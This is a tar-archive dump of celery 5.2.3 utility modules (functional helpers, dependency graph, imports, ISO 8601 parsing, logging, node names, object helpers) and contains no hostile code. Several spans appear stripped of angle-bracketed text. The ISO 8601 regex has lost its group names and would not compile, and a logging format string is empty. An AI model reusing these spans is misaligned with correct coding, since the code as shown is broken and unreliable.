{attr: getattr(obj, attr, None) for attr in attrs} def uniq(it): """Return all unique elements in ``it``, preserving order.""" seen = set() return (seen.add(obj) or obj for obj in it if obj not in seen) def lookahead(it): """Yield pairs of (current, next) items in `it`. `next` is None if `current` is the last item. Example: >>> list(lookahead(x for x in range(6))) [(0, 1), (1, 2), (2, 3), (3, 4), (4, 5), (5, None)] """ a, b = tee(it) next(b, None) return zip_longest(a, b) def regen(it): """Convert iterator to an object that can be consumed multiple times. ``Regen`` takes any iterable, and if the object is an generator it will cache the evaluated list on first access, so that the generator can be "consumed" multiple times. """ if isinstance(it, (list, tuple)): return it return _regen(it) class _regen(UserList, list): # must be subclass of list so that json can encode. def __init__(self, it): # pylint: disable=super-init-not-called # UserList creates a new list and sets .data, so we don't # want to call init here. self.__it = it self.__consumed = [] self.__done = False def __reduce__(self): return list, (self.data,) def __length_hint__(self): return self.__it.__length_hint__() def __lookahead_consume(self, limit=None): if not self.__done and (limit is None or limit > 0): it = iter(self.__it) try: now = next(it) except StopIteration: return self.__consumed.append(now) # Maintain a single look-ahead to ensure we set `__done` when the # underlying iterator gets exhausted while not self.__done: try: next_ = next(it) self.__consumed.append(next_) except StopIteration: self.__done = True break finally: yield now now = next_ # We can break out when `limit` is exhausted if limit is not None: limit -= 1 if limit <= 0: break def __iter__(self): yield from self.__consumed yield from self.__lookahead_consume() def __getitem__(self, index): if index < 0: return self.data[index] # Consume elements up to the desired index prior to attempting to # access it from within `__consumed` consume_count = index - len(self.__consumed) + 1 for _ in self.__lookahead_consume(limit=consume_count): pass return self.__consumed[index] def __bool__(self): if len(self.__consumed): return True try: next(iter(self)) except StopIteration: return False else: return True @property def data(self): if not self.__done: self.__consumed.extend(self.__it) self.__done = True return self.__consumed def __repr__(self): return "<{}: [{}{}]>".format( self.__class__.__name__, ", ".join(repr(e) for e in self.__consumed), "..." if not self.__done else "", ) def _argsfromspec(spec, replace_defaults=True): if spec.defaults: split = len(spec.defaults) defaults = (list(range(len(spec.defaults))) if replace_defaults else spec.defaults) positional = spec.args[:-split] optional = list(zip(spec.args[-split:], defaults)) else: positional, optional = spec.args, [] varargs = spec.varargs varkw = spec.varkw if spec.kwonlydefaults: kwonlyargs = set(spec.kwonlyargs) - set(spec.kwonlydefaults.keys()) if replace_defaults: kwonlyargs_optional = [ (kw, i) for i, kw in enumerate(spec.kwonlydefaults.keys()) ] else: kwonlyargs_optional = list(spec.kwonlydefaults.items()) else: kwonlyargs, kwonlyargs_optional = spec.kwonlyargs, [] return ', '.join(filter(None, [ ', '.join(positional), ', '.join(f'{k}={v}' for k, v in optional), f'*{varargs}' if varargs else None, '*' if (kwonlyargs or kwonlyargs_optional) and not varargs else None, ', '.join(kwonlyargs) if kwonlyargs else None, ', '.join(f'{k}="{v}"' for k, v in kwonlyargs_optional), f'**{varkw}' if varkw else None, ])) def head_from_fun(fun, bound=False, debug=False): """Generate signature function from actual function.""" # we could use inspect.Signature here, but that implementation # is very slow since it implements the argument checking # in pure-Python. Instead we use exec to create a new function # with an empty body, meaning it has the same performance as # as just calling a function. is_function = inspect.isfunction(fun) is_callable = hasattr(fun, '__call__') is_cython = fun.__class__.__name__ == 'cython_function_or_method' is_method = inspect.ismethod(fun) if not is_function and is_callable and not is_method and not is_cython: name, fun = fun.__class__.__name__, fun.__call__ else: name = fun.__name__ definition = FUNHEAD_TEMPLATE.format( fun_name=name, fun_args=_argsfromspec(inspect.getfullargspec(fun)), fun_value=1, ) if debug: # pragma: no cover print(definition, file=sys.stderr) namespace = {'__name__': fun.__module__} # pylint: disable=exec-used # Tasks are rarely, if ever, created at runtime - exec here is fine. exec(definition, namespace) result = namespace[name] result._source = definition if bound: return partial(result, object()) return result def arity_greater(fun, n): argspec = inspect.getfullargspec(fun) return argspec.varargs or len(argspec.args) > n def fun_takes_argument(name, fun, position=None): spec = inspect.getfullargspec(fun) return ( spec.varkw or spec.varargs or (len(spec.args) >= position if position else name in spec.args) ) def fun_accepts_kwargs(fun): """Return true if function accepts arbitrary keyword arguments.""" return any( p for p in inspect.signature(fun).parameters.values() if p.kind == p.VAR_KEYWORD ) def maybe(typ, val): """Call typ on value if val is defined.""" return typ(val) if val is not None else val def seq_concat_item(seq, item): """Return copy of sequence seq with item added. Returns: Sequence: if seq is a tuple, the result will be a tuple, otherwise it depends on the implementation of ``__add__``. """ return seq + (item,) if isinstance(seq, tuple) else seq + [item] def seq_concat_seq(a, b): """Concatenate two sequences: ``a + b``. Returns: Sequence: The return value will depend on the largest sequence - if b is larger and is a tuple, the return value will be a tuple. - if a is larger and is a list, the return value will be a list, """ # find the type of the largest sequence prefer = type(max([a, b], key=len)) # convert the smallest list to the type of the largest sequence. if not isinstance(a, prefer): a = prefer(a) if not isinstance(b, prefer): b = prefer(b) return a + b ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/graph.py0000664000175000017500000002152100000000000016774 0ustar00asifasif00000000000000"""Dependency graph implementation.""" from collections import Counter from textwrap import dedent from kombu.utils.encoding import bytes_to_str, safe_str __all__ = ('DOT', 'CycleError', 'DependencyGraph', 'GraphFormatter') class DOT: """Constants related to the dot format.""" HEAD = dedent(""" {IN}{type} {id} {{ {INp}graph [{attrs}] """) ATTR = '{name}={value}' NODE = '{INp}"{0}" [{attrs}]' EDGE = '{INp}"{0}" {dir} "{1}" [{attrs}]' ATTRSEP = ', ' DIRS = {'graph': '--', 'digraph': '->'} TAIL = '{IN}}}' class CycleError(Exception): """A cycle was detected in an acyclic graph.""" class DependencyGraph: """A directed acyclic graph of objects and their dependencies. Supports a robust topological sort to detect the order in which they must be handled. Takes an optional iterator of ``(obj, dependencies)`` tuples to build the graph from. Warning: Does not support cycle detection. """ def __init__(self, it=None, formatter=None): self.formatter = formatter or GraphFormatter() self.adjacent = {} if it is not None: self.update(it) def add_arc(self, obj): """Add an object to the graph.""" self.adjacent.setdefault(obj, []) def add_edge(self, A, B): """Add an edge from object ``A`` to object ``B``. I.e. ``A`` depends on ``B``. """ self[A].append(B) def connect(self, graph): """Add nodes from another graph.""" self.adjacent.update(graph.adjacent) def topsort(self): """Sort the graph topologically. Returns: List: of objects in the order in which they must be handled. """ graph = DependencyGraph() components = self._tarjan72() NC = { node: component for component in components for node in component } for component in components: graph.add_arc(component) for node in self: node_c = NC[node] for successor in self[node]: successor_c = NC[successor] if node_c != successor_c: graph.add_edge(node_c, successor_c) return [t[0] for t in graph._khan62()] def valency_of(self, obj): """Return the valency (degree) of a vertex in the graph.""" try: l = [len(self[obj])] except KeyError: return 0 for node in self[obj]: l.append(self.valency_of(node)) return sum(l) def update(self, it): """Update graph with data from a list of ``(obj, deps)`` tuples.""" tups = list(it) for obj, _ in tups: self.add_arc(obj) for obj, deps in tups: for dep in deps: self.add_edge(obj, dep) def edges(self): """Return generator that yields for all edges in the graph.""" return (obj for obj, adj in self.items() if adj) def _khan62(self): """Perform Khan's simple topological sort algorithm from '62. See https://en.wikipedia.org/wiki/Topological_sorting """ count = Counter() result = [] for node in self: for successor in self[node]: count[successor] += 1 ready = [node for node in self if not count[node]] while ready: node = ready.pop() result.append(node) for successor in self[node]: count[successor] -= 1 if count[successor] == 0: ready.append(successor) result.reverse() return result def _tarjan72(self): """Perform Tarjan's algorithm to find strongly connected components. See Also: :wikipedia:`Tarjan%27s_strongly_connected_components_algorithm` """ result, stack, low = [], [], {} def visit(node): if node in low: return num = len(low) low[node] = num stack_pos = len(stack) stack.append(node) for successor in self[node]: visit(successor) low[node] = min(low[node], low[successor]) if num == low[node]: component = tuple(stack[stack_pos:]) stack[stack_pos:] = [] result.append(component) for item in component: low[item] = len(self) for node in self: visit(node) return result def to_dot(self, fh, formatter=None): """Convert the graph to DOT format. Arguments: fh (IO): A file, or a file-like object to write the graph to. formatter (celery.utils.graph.GraphFormatter): Custom graph formatter to use. """ seen = set() draw = formatter or self.formatter def P(s): print(bytes_to_str(s), file=fh) def if_not_seen(fun, obj): if draw.label(obj) not in seen: P(fun(obj)) seen.add(draw.label(obj)) P(draw.head()) for obj, adjacent in self.items(): if not adjacent: if_not_seen(draw.terminal_node, obj) for req in adjacent: if_not_seen(draw.node, obj) P(draw.edge(obj, req)) P(draw.tail()) def format(self, obj): return self.formatter(obj) if self.formatter else obj def __iter__(self): return iter(self.adjacent) def __getitem__(self, node): return self.adjacent[node] def __len__(self): return len(self.adjacent) def __contains__(self, obj): return obj in self.adjacent def _iterate_items(self): return self.adjacent.items() items = iteritems = _iterate_items def __repr__(self): return '\n'.join(self.repr_node(N) for N in self) def repr_node(self, obj, level=1, fmt='{0}({1})'): output = [fmt.format(obj, self.valency_of(obj))] if obj in self: for other in self[obj]: d = fmt.format(other, self.valency_of(other)) output.append(' ' * level + d) output.extend(self.repr_node(other, level + 1).split('\n')[1:]) return '\n'.join(output) class GraphFormatter: """Format dependency graphs.""" _attr = DOT.ATTR.strip() _node = DOT.NODE.strip() _edge = DOT.EDGE.strip() _head = DOT.HEAD.strip() _tail = DOT.TAIL.strip() _attrsep = DOT.ATTRSEP _dirs = dict(DOT.DIRS) scheme = { 'shape': 'box', 'arrowhead': 'vee', 'style': 'filled', 'fontname': 'HelveticaNeue', } edge_scheme = { 'color': 'darkseagreen4', 'arrowcolor': 'black', 'arrowsize': 0.7, } node_scheme = {'fillcolor': 'palegreen3', 'color': 'palegreen4'} term_scheme = {'fillcolor': 'palegreen1', 'color': 'palegreen2'} graph_scheme = {'bgcolor': 'mintcream'} def __init__(self, root=None, type=None, id=None, indent=0, inw=' ' * 4, **scheme): self.id = id or 'dependencies' self.root = root self.type = type or 'digraph' self.direction = self._dirs[self.type] self.IN = inw * (indent or 0) self.INp = self.IN + inw self.scheme = dict(self.scheme, **scheme) self.graph_scheme = dict(self.graph_scheme, root=self.label(self.root)) def attr(self, name, value): value = f'"{value}"' return self.FMT(self._attr, name=name, value=value) def attrs(self, d, scheme=None): d = dict(self.scheme, **dict(scheme, **d or {}) if scheme else d) return self._attrsep.join( safe_str(self.attr(k, v)) for k, v in d.items() ) def head(self, **attrs): return self.FMT( self._head, id=self.id, type=self.type, attrs=self.attrs(attrs, self.graph_scheme), ) def tail(self): return self.FMT(self._tail) def label(self, obj): return obj def node(self, obj, **attrs): return self.draw_node(obj, self.node_scheme, attrs) def terminal_node(self, obj, **attrs): return self.draw_node(obj, self.term_scheme, attrs) def edge(self, a, b, **attrs): return self.draw_edge(a, b, **attrs) def _enc(self, s): return s.encode('utf-8', 'ignore') def FMT(self, fmt, *args, **kwargs): return self._enc(fmt.format( *args, **dict(kwargs, IN=self.IN, INp=self.INp) )) def draw_edge(self, a, b, scheme=None, attrs=None): return self.FMT( self._edge, self.label(a), self.label(b), dir=self.direction, attrs=self.attrs(attrs, self.edge_scheme), ) def draw_node(self, obj, scheme=None, attrs=None): return self.FMT( self._node, self.label(obj), attrs=self.attrs(attrs, scheme), ) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/imports.py0000664000175000017500000001133200000000000017367 0ustar00asifasif00000000000000"""Utilities related to importing modules and symbols by name.""" import importlib import os import sys import warnings from contextlib import contextmanager from importlib import reload from kombu.utils.imports import symbol_by_name #: Billiard sets this when execv is enabled. #: We use it to find out the name of the original ``__main__`` #: module, so that we can properly rewrite the name of the #: task to be that of ``App.main``. MP_MAIN_FILE = os.environ.get('MP_MAIN_FILE') __all__ = ( 'NotAPackage', 'qualname', 'instantiate', 'symbol_by_name', 'cwd_in_path', 'find_module', 'import_from_cwd', 'reload_from_cwd', 'module_file', 'gen_task_name', ) class NotAPackage(Exception): """Raised when importing a package, but it's not a package.""" def qualname(obj): """Return object name.""" if not hasattr(obj, '__name__') and hasattr(obj, '__class__'): obj = obj.__class__ q = getattr(obj, '__qualname__', None) if '.' not in q: q = '.'.join((obj.__module__, q)) return q def instantiate(name, *args, **kwargs): """Instantiate class by name. See Also: :func:`symbol_by_name`. """ return symbol_by_name(name)(*args, **kwargs) @contextmanager def cwd_in_path(): """Context adding the current working directory to sys.path.""" cwd = os.getcwd() if cwd in sys.path: yield else: sys.path.insert(0, cwd) try: yield cwd finally: try: sys.path.remove(cwd) except ValueError: # pragma: no cover pass def find_module(module, path=None, imp=None): """Version of :func:`imp.find_module` supporting dots.""" if imp is None: imp = importlib.import_module with cwd_in_path(): try: return imp(module) except ImportError: # Raise a more specific error if the problem is that one of the # dot-separated segments of the module name is not a package. if '.' in module: parts = module.split('.') for i, part in enumerate(parts[:-1]): package = '.'.join(parts[:i + 1]) try: mpart = imp(package) except ImportError: # Break out and re-raise the original ImportError # instead. break try: mpart.__path__ except AttributeError: raise NotAPackage(package) raise def import_from_cwd(module, imp=None, package=None): """Import module, temporarily including modules in the current directory. Modules located in the current directory has precedence over modules located in `sys.path`. """ if imp is None: imp = importlib.import_module with cwd_in_path(): return imp(module, package=package) def reload_from_cwd(module, reloader=None): """Reload module (ensuring that CWD is in sys.path).""" if reloader is None: reloader = reload with cwd_in_path(): return reloader(module) def module_file(module): """Return the correct original file name of a module.""" name = module.__file__ return name[:-1] if name.endswith('.pyc') else name def gen_task_name(app, name, module_name): """Generate task name from name/module pair.""" module_name = module_name or '__main__' try: module = sys.modules[module_name] except KeyError: # Fix for manage.py shell_plus (Issue #366) module = None if module is not None: module_name = module.__name__ # - If the task module is used as the __main__ script # - we need to rewrite the module part of the task name # - to match App.main. if MP_MAIN_FILE and module.__file__ == MP_MAIN_FILE: # - see comment about :envvar:`MP_MAIN_FILE` above. module_name = '__main__' if module_name == '__main__' and app.main: return '.'.join([app.main, name]) return '.'.join(p for p in (module_name, name) if p) def load_extension_class_names(namespace): try: from pkg_resources import iter_entry_points except ImportError: # pragma: no cover return for ep in iter_entry_points(namespace): yield ep.name, ':'.join([ep.module_name, ep.attrs[0]]) def load_extension_classes(namespace): for name, class_name in load_extension_class_names(namespace): try: cls = symbol_by_name(class_name) except (ImportError, SyntaxError) as exc: warnings.warn( f'Cannot load {namespace} extension {class_name!r}: {exc!r}') else: yield name, cls ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/iso8601.py0000664000175000017500000000533000000000000017004 0ustar00asifasif00000000000000"""Parse ISO8601 dates. Originally taken from :pypi:`pyiso8601` (https://bitbucket.org/micktwomey/pyiso8601) Modified to match the behavior of ``dateutil.parser``: - raise :exc:`ValueError` instead of ``ParseError`` - return naive :class:`~datetime.datetime` by default - uses :class:`pytz.FixedOffset` This is the original License: Copyright (c) 2007 Michael Twomey Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sub-license, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import re from datetime import datetime from pytz import FixedOffset __all__ = ('parse_iso8601',) # Adapted from http://delete.me.uk/2005/03/iso8601.html ISO8601_REGEX = re.compile( r'(?P[0-9]{4})(-(?P[0-9]{1,2})(-(?P[0-9]{1,2})' r'((?P.)(?P[0-9]{2}):(?P[0-9]{2})' r'(:(?P[0-9]{2})(\.(?P[0-9]+))?)?' r'(?PZ|(([-+])([0-9]{2}):([0-9]{2})))?)?)?)?' ) TIMEZONE_REGEX = re.compile( r'(?P[+-])(?P[0-9]{2}).(?P[0-9]{2})' ) def parse_iso8601(datestring): """Parse and convert ISO-8601 string to datetime.""" m = ISO8601_REGEX.match(datestring) if not m: raise ValueError('unable to parse date string %r' % datestring) groups = m.groupdict() tz = groups['timezone'] if tz == 'Z': tz = FixedOffset(0) elif tz: m = TIMEZONE_REGEX.match(tz) prefix, hours, minutes = m.groups() hours, minutes = int(hours), int(minutes) if prefix == '-': hours = -hours minutes = -minutes tz = FixedOffset(minutes + hours * 60) return datetime( int(groups['year']), int(groups['month']), int(groups['day']), int(groups['hour'] or 0), int(groups['minute'] or 0), int(groups['second'] or 0), int(groups['fraction'] or 0), tz ) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/celery/utils/log.py0000664000175000017500000002115100000000000016453 0ustar00asifasif00000000000000"""Logging utilities.""" import logging import numbers import os import sys import threading import traceback from contextlib import contextmanager from typing import AnyStr, Sequence from kombu.log import LOG_LEVELS from kombu.log import get_logger as _get_logger from kombu.utils.encoding import safe_str from .term import colored __all__ = ( 'ColorFormatter', 'LoggingProxy', 'base_logger', 'set_in_sighandler', 'in_sighandler', 'get_logger', 'get_task_logger', 'mlevel', 'get_multiprocessing_logger', 'reset_multiprocessing_logger', 'LOG_LEVELS' ) _process_aware = False _in_sighandler = False MP_LOG = os.environ.get('MP_LOG', False) RESERVED_LOGGER_NAMES = {'celery', 'celery.task'} # Sets up our logging hierarchy. # # Every logger in the celery package inherits from the "celery" # logger, and every task logger inherits from the "celery.task" # logger. base_logger = logger = _get_logger('celery') def set_in_sighandler(value): """Set flag signifiying that we're inside a signal handler.""" global _in_sighandler _in_sighandler = value def iter_open_logger_fds(): seen = set() loggers = (list(logging.Logger.manager.loggerDict.values()) + [logging.getLogger(None)]) for l in loggers: try: for handler in l.handlers: try: if handler not in seen: # pragma: no cover yield handler.stream seen.add(handler) except AttributeError: pass except AttributeError: # PlaceHolder does not have handlers pass @contextmanager def in_sighandler(): """Context that records that we are in a signal handler.""" set_in_sighandler(True) try: yield finally: set_in_sighandler(False) def logger_isa(l, p, max=1000): this, seen = l, set() for _ in range(max): if this == p: return True else: if this in seen: raise RuntimeError( f'Logger {l.name!r} parents recursive', ) seen.add(this) this = this.parent if not this: break else: # pragma: no cover raise RuntimeError(f'Logger hierarchy exceeds {max}') return False def _using_logger_parent(parent_logger, logger_): if not logger_isa(logger_, parent_logger): logger_.parent = parent_logger return logger_ def get_logger(name): """Get logger by name.""" l = _get_logger(name) if logging.root not in (l, l.parent) and l is not base_logger: l = _using_logger_parent(base_logger, l) return l task_logger = get_logger('celery.task') worker_logger = get_logger('celery.worker') def get_task_logger(name): """Get logger for task module by name.""" if name in RESERVED_LOGGER_NAMES: raise RuntimeError(f'Logger name {name!r} is reserved!') return _using_logger_parent(task_logger, get_logger(name)) def mlevel(level): """Convert level name/int to log level.""" if level and not isinstance(level, numbers.Integral): return LOG_LEVELS[level.upper()] return level class ColorFormatter(logging.Formatter): """Logging formatter that adds colors based on severity.""" #: Loglevel -> Color mapping. COLORS = colored().names colors = { 'DEBUG': COLORS['blue'], 'WARNING': COLORS['yellow'], 'ERROR': COLORS['red'], 'CRITICAL': COLORS['magenta'], } def __init__(self, fmt=None, use_color=True): super().__init__(fmt) self.use_color = use_color def formatException(self, ei): if ei and not isinstance(ei, tuple): ei = sys.exc_info() r = super().formatException(ei) return r def format(self, record): msg = super().format(record) color = self.colors.get(record.levelname) # reset exception info later for other handlers... einfo = sys.exc_info() if record.exc_info == 1 else record.exc_info if color and self.use_color: try: # safe_str will repr the color object # and color will break on non-string objects # so need to reorder calls based on type. # Issue #427 try: if isinstance(msg, str): return str(color(safe_str(msg))) return safe_str(color(msg)) except UnicodeDecodeError: # pragma: no cover return safe_str(msg) # skip colors except Exception as exc: # pylint: disable=broad-except prev_msg, record.exc_info, record.msg = ( record.msg, 1, ''.format( type(msg), exc ), ) try: return super().format(record) finally: record.msg, record.exc_info = prev_msg, einfo else: return safe_str(msg) class LoggingProxy: """Forward file object to :class:`logging.Logger` instance. Arguments: logger (~logging.Logger): Logger instance to forward to. loglevel (int, str): Log level to use when logging messages. """ mode = 'w' name = None closed = False loglevel = logging.ERROR _thread = threading.local() def __init__(self, logger, loglevel=None): # pylint: disable=redefined-outer-name # Note that the logger global is redefined here, be careful changing. self.logger = logger self.loglevel = mlevel(loglevel or self.logger.level or self.loglevel) self._safewrap_handlers() def _safewrap_handlers(self): # Make the logger handlers dump internal errors to # :data:`sys.__stderr__` instead of :data:`sys.stderr` to circumvent # infinite loops. def wrap_handler(handler): # pragma: no cover class WithSafeHandleError(logging.Handler): def handleError(self, record): try: traceback.print_exc(None, sys.__stderr__) except OSError: pass # see python issue 5971 handler.handleError = WithSafeHandleError().handleError return [wrap_handler(h) for h in self.logger.handlers] def write(self, data): # type: (AnyStr) -> int """Write message to logging object.""" if _in_sighandler: safe_data = safe_str(data) print(safe_data, file=sys.__stderr__) return len(safe_data) if getattr(self._thread, 'recurse_protection', False): # Logger is logging back to this file, so stop recursing. return 0 if data and not self.closed: self._thread.recurse_protection = True try: safe_data = safe_str(data).rstrip('\n') if safe_data: self.logger.log(self.loglevel, safe_data) return len(safe_data) finally: self._thread.recurse_protection = False return 0 def writelines(self, sequence): # type: (Sequence[str]) -> None """Write list of strings to file. The sequence can be any iterable object producing strings. This is equivalent to calling :meth:`write` for each string. """ for part in sequence: self.write(part) def flush(self): # This object is not buffered so any :meth:`flush` # requests are ignored. pass def close(self): # when the object is closed, no write requests are # forwarded to the logging object anymore. self.closed = True def isatty(self): """Here for file support.""" return False def get_multiprocessing_logger(): """Return the multiprocessing logger.""" try: from billiard import util except ImportError: # pragma: no cover pass else: return util.get_logger() def reset_multiprocessing_logger(): """Reset multiprocessing logging setup.""" try: from billiard import util except ImportError: # pragma: no cover pass else: if hasattr(util, '_logger'): # pragma: no cover util._logger = None def current_process(): try: from billiard import process except ImportError: # pragma: no cover pass else: return process.current_process() def current_process_index(base=1): index = getattr(current_process(), 'index', None) return index + base if index is not None else index ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/nodenames.py0000664000175000017500000000545200000000000017651 0ustar00asifasif00000000000000"""Worker name utilities.""" import os import socket from functools import partial from kombu.entity import Exchange, Queue from .functional import memoize from .text import simple_format #: Exchange for worker direct queues. WORKER_DIRECT_EXCHANGE = Exchange('C.dq2') #: Format for worker direct queue names. WORKER_DIRECT_QUEUE_FORMAT = '{hostname}.dq2' #: Separator for worker node name and hostname. NODENAME_SEP = '@' NODENAME_DEFAULT = 'celery' gethostname = memoize(1, Cache=dict)(socket.gethostname) __all__ = ( 'worker_direct', 'gethostname', 'nodename', 'anon_nodename', 'nodesplit', 'default_nodename', 'node_format', 'host_format', ) def worker_direct(hostname): """Return the :class:`kombu.Queue` being a direct route to a worker. Arguments: hostname (str, ~kombu.Queue): The fully qualified node name of a worker (e.g., ``w1@example.com``). If passed a :class:`kombu.Queue` instance it will simply return that instead. """ if isinstance(hostname, Queue): return hostname return Queue( WORKER_DIRECT_QUEUE_FORMAT.format(hostname=hostname), WORKER_DIRECT_EXCHANGE, hostname, ) def nodename(name, hostname): """Create node name from name/hostname pair.""" return NODENAME_SEP.join((name, hostname)) def anon_nodename(hostname=None, prefix='gen'): """Return the nodename for this process (not a worker). This is used for e.g. the origin task message field. """ return nodename(''.join([prefix, str(os.getpid())]), hostname or gethostname()) def nodesplit(name): """Split node name into tuple of name/hostname.""" parts = name.split(NODENAME_SEP, 1) if len(parts) == 1: return None, parts[0] return parts def default_nodename(hostname): """Return the default nodename for this process.""" name, host = nodesplit(hostname or '') return nodename(name or NODENAME_DEFAULT, host or gethostname()) def node_format(s, name, **extra): """Format worker node name (name@host.com).""" shortname, host = nodesplit(name) return host_format( s, host, shortname or NODENAME_DEFAULT, p=name, **extra) def _fmt_process_index(prefix='', default='0'): from .log import current_process_index index = current_process_index() return f'{prefix}{index}' if index else default _fmt_process_index_with_prefix = partial(_fmt_process_index, '-', '') def host_format(s, host=None, name=None, **extra): """Format host %x abbreviations.""" host = host or gethostname() hname, _, domain = host.partition('.') name = name or hname keys = dict({ 'h': host, 'n': name, 'd': domain, 'i': _fmt_process_index, 'I': _fmt_process_index_with_prefix, }, **extra) return simple_format(s, keys) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/objects.py0000664000175000017500000001016700000000000017330 0ustar00asifasif00000000000000"""Object related utilities, including introspection, etc.""" from functools import reduce __all__ = ('Bunch', 'FallbackContext', 'getitem_property', 'mro_lookup') class Bunch: """Object that enables you to modify attributes.""" def __init__(self, **kwargs): self.__dict__.update(kwargs) def mro_lookup(cls, attr, stop=None, monkey_patched=None): """Return the first node by MRO order that defines an attribute. Arguments: cls (Any): Child class to traverse. attr (str): Name of attribute to find. stop (Set[Any]): A set of types that if reached will stop the search. monkey_patched (Sequence): Use one of the stop classes if the attributes module origin isn't in this list. Used to detect monkey patched attributes. Returns: Any: The attribute value, or :const:`None` if not found. """ stop = set() if not stop else stop monkey_patched = [] if not monkey_patched else monkey_patched for node in cls.mro(): if node in stop: try: value = node.__dict__[attr] module_origin = value.__module__ except (AttributeError, KeyError): pass else: if module_origin not in monkey_patched: return node return if attr in node.__dict__: return node class FallbackContext: """Context workaround. The built-in ``@contextmanager`` utility does not work well when wrapping other contexts, as the traceback is wrong when the wrapped context raises. This solves this problem and can be used instead of ``@contextmanager`` in this example:: @contextmanager def connection_or_default_connection(connection=None): if connection: # user already has a connection, shouldn't close # after use yield connection else: # must've new connection, and also close the connection # after the block returns with create_new_connection() as connection: yield connection This wrapper can be used instead for the above like this:: def connection_or_default_connection(connection=None): return FallbackContext(connection, create_new_connection) """ def __init__(self, provided, fallback, *fb_args, **fb_kwargs): self.provided = provided self.fallback = fallback self.fb_args = fb_args self.fb_kwargs = fb_kwargs self._context = None def __enter__(self): if self.provided is not None: return self.provided context = self._context = self.fallback( *self.fb_args, **self.fb_kwargs ).__enter__() return context def __exit__(self, *exc_info): if self._context is not None: return self._context.__exit__(*exc_info) class getitem_property: """Attribute -> dict key descriptor. The target object must support ``__getitem__``, and optionally ``__setitem__``. Example: >>> from collections import defaultdict >>> class Me(dict): ... deep = defaultdict(dict) ... ... foo = _getitem_property('foo') ... deep_thing = _getitem_property('deep.thing') >>> me = Me() >>> me.foo None >>> me.foo = 10 >>> me.foo 10 >>> me['foo'] 10 >>> me.deep_thing = 42 >>> me.deep_thing 42 >>> me.deep defaultdict(, {'thing': 42}) """ def __init__(self, keypath, doc=None): path, _, self.key = keypath.rpartition('.') self.path = path.split('.') if path else None self.__doc__ = doc def _path(self, obj): return (reduce(lambda d, k: d[k], [obj] + self.path) if self.path else obj) def __get__(self, obj, type=None): if obj is None: return type return self._path(obj).get(self.key) def __set__(self, obj, value): self._path(obj)[self.key] = value ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/utils/saferepr.py0000664000175000017500000002172700000000000017512 0ustar00asifasif00000000000000"""Streaming, truncating, non-recursive version of :func:`repr`. Differences from regular :func:`repr`: - Sets are represented the Python 3 way: ``{1, 2}`` vs ``set([1, 2])``. - Unicode strings does not have the ``u'`` prefix, even on Python 2. - Empty set formatted as ``set()`` (Python 3), not ``set([])`` (Python 2). - Longs don't have the ``L`` suffix. Very slow with no limits, super quick with limits. """ import traceback from collections import deque, namedtuple from decimal import Decimal from itertools import chain from numbers import Number from pprint import _recursion from typing import (Any, AnyStr, Callable, Dict, Iterator, List, Sequence, Set, Tuple) from .text import truncate __all__ = ('saferepr', 'reprstream') #: Node representing literal text. #: - .value: is the literal text value #: - .truncate: specifies if this text can be truncated, for things like #: LIT_DICT_END this will be False, as we always display #: the ending brackets, e.g: [[[1, 2, 3, ...,], ..., ]] #: - .direction: If +1 the current level is increment by one, #: if -1 the current level is decremented by one, and #: if 0 the current level is unchanged. _literal = namedtuple('_literal', ('value', 'truncate', 'direction')) #: Node representing a dictionary key. _key = namedtuple('_key', ('value',)) #: Node representing quoted text, e.g. a string value. _quoted = namedtuple('_quoted', ('value',)) #: Recursion protection. _dirty = namedtuple('_dirty', ('objid',)) #: Types that are repsented as chars. chars_t = (bytes, str) #: Types that are regarded as safe to call repr on. safe_t = (Number,) #: Set types. set_t = (frozenset, set) LIT_DICT_START = _literal('{', False, +1) LIT_DICT_KVSEP = _literal(': ', True, 0) LIT_DICT_END = _literal('}', False, -1) LIT_LIST_START = _literal('[', False, +1) LIT_LIST_END = _literal(']', False, -1) LIT_LIST_SEP = _literal(', ', True, 0) LIT_SET_START = _literal('{', False, +1) LIT_SET_END = _literal('}', False, -1) LIT_TUPLE_START = _literal('(', False, +1) LIT_TUPLE_END = _literal(')', False, -1) LIT_TUPLE_END_SV = _literal(',)', False, -1) def saferepr(o, maxlen=None, maxlevels=3, seen=None): # type: (Any, int, int, Set) -> str """Safe version of :func:`repr`. Warning: Make sure you set the maxlen argument, or it will be very slow for recursive objects. With the maxlen set, it's often faster than built-in repr. """ return ''.join(_saferepr( o, maxlen=maxlen, maxlevels=maxlevels, seen=seen )) def _chaindict(mapping, LIT_DICT_KVSEP=LIT_DICT_KVSEP, LIT_LIST_SEP=LIT_LIST_SEP): # type: (Dict, _literal, _literal) -> Iterator[Any] size = len(mapping) for i, (k, v) in enumerate(mapping.items()): yield _key(k) yield LIT_DICT_KVSEP yield v if i < (size - 1): yield LIT_LIST_SEP def _chainlist(it, LIT_LIST_SEP=LIT_LIST_SEP): # type: (List) -> Iterator[Any] size = 